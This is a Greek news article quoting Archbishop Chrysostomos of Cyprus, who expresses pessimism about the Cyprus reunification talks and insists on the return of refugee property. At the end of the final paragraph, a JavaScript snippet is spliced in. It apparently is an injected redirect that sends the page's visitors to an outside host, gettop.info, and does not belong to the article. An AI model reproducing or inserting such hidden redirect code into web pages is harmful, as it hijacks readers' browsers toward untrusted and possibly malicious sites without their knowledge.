Αρχιεπίσκοπος Χρυσόστομος: Λύση δεν βλέπω γιατί οι Τούρκοι θέλουν τα πάντα

0
9

 

Για το Κυπριακό ερωτήθη ο Αρχιεπίσκοπος Χρυσόστομος στη Θεσσαλονίκη όπου βρίσκεται, καθώς ξεκινούν οι συνομιλίες στην Ελβετία τη Δευτέρα.

Ο κκ. Χρυσόστομος εξέφρασε την απαισιοδοξία του για λύση στο Κυπριακό τονίζοντας: «Μπορώ να πω, ότι ουδέποτε πίστεψα ότι θα φτάσουμε στο τέλος. Γιατί οι Τούρκοι θέλουν τα πάντα, όταν χωρίς ντροπή ομιλούν για τις «πραγματικότητες» που υπάρχουν στην Κύπρο και οι πραγματικότητες είναι τα σπίτια και οι περιουσίες των προσφύγων μας, που οι Τούρκοι τα πήραν, δια της δυνάμεως των όπλων και λένε ότι είναι δικά τους».

«Δεν μπορεί να κλείσει το Κυπριακό, εάν δεν επιστραφούν εδάφη, σπίτια, περιουσίες. Είναι δικά μας, τα διεκδικούμε και θα τα διεκδικούμε και οφείλουν να προσγειωθούν, ιδίως η Άγκυρα» επεσήμανε και συμπλήρωσε: «Αποτελούν το 18% του κυπριακού πληθυσμού και να μην επιμένουν ότι θα πάρουν έδαφος 29% που είχε το σχέδιο Ανάν, ή να πάρουν το 60% των ακτογραμμών».

«Και δεν πιστεύω ότι πρέπει να τους επιτρέψουμε να υλοποιήσουν όλους τους στόχους τους» είπε. Επίσης επεσήμανε ότι πρωταρχικός στόχος της Τουρκίας και των εκπροσώπων της τουρκοκυπριακής κοινότητας «από το 1954» ήταν «να κάνουν διχοτόμηση».

«Λύση, εγώ δε βλέπω, γιατί, όπως είπα, οι Τούρκοι θέλουν τα πάντα. Ε, δεν πρόκειται να τους δώσουμε τα πάντα!» είπε ο αρχιεπίσκοπος Κύπρου. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here